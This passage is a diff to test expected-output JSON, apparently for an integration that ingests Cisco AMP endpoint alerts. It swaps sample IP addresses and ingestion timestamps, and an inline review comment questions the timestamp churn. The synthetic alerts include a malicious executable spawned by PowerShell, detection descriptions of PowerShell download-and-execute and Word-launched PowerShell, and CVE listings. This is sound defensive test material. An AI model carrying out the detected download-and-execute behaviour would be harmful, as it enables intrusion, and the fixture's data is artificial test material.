\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", + "ingested": "2021-12-09T13:35:29.222611300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3304,7 +3304,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3349,7 +3349,7 @@ "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3359,8 +3359,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322508675Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", + "ingested": "2021-12-09T13:35:29.222616500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3380,7 +3380,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3428,7 +3428,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3438,8 +3438,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:13:59.322510884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "ingested": "2021-12-09T13:35:29.222621400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3460,7 +3460,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3515,7 +3515,7 @@ "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3525,8 +3525,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322513087Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", + "ingested": "2021-12-09T13:35:29.222629400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2020-12-25T05:30:41.000Z", @@ -3547,7 +3547,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3601,7 +3601,7 @@ "d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3611,8 +3611,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322515282Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "ingested": "2021-12-09T13:35:29.222635300Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T05:02:27.000Z", @@ -3633,7 +3633,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -3701,7 +3701,7 @@ "1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3711,8 +3711,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322517491Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", + "ingested": "2021-12-09T13:35:29.222639700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", "start": "2020-12-25T05:02:26.000Z", @@ -3733,7 +3733,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -3801,7 +3801,7 @@
 "465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
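Review bot: The `event.ingested` values in the -3711 hunk just above (2021-09-30 → 2021-12-09), and likewise in the -3811, -3927, -3983 and -4047 hunks below, change without being part of the IP fix this commit makes. If elastic-package treats `event.ingested` as a dynamic field, as its pipeline test runner normally does, those lines are regeneration noise that buries the substantive `external_ip` edits; regenerating with the previous timestamps kept, or committing only the `external_ip` and `related.ip` lines, would keep the expected-output diff reviewable. This hunk's own change, `- "8.8.8.8",` → `+ "81.2.69.144",` in `related.ip`, is consistent with the `external_ip` values elsewhere in the file, and the private `10.10.10.10` entry is rightly left untouched.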
@@ -3811,8 +3811,8 @@ }, "event": { "severity": 1, - "ingested": "2021-09-30T00:13:59.322519685Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 
Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", + "ingested": "2021-12-09T13:35:29.222643900Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application 
Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft 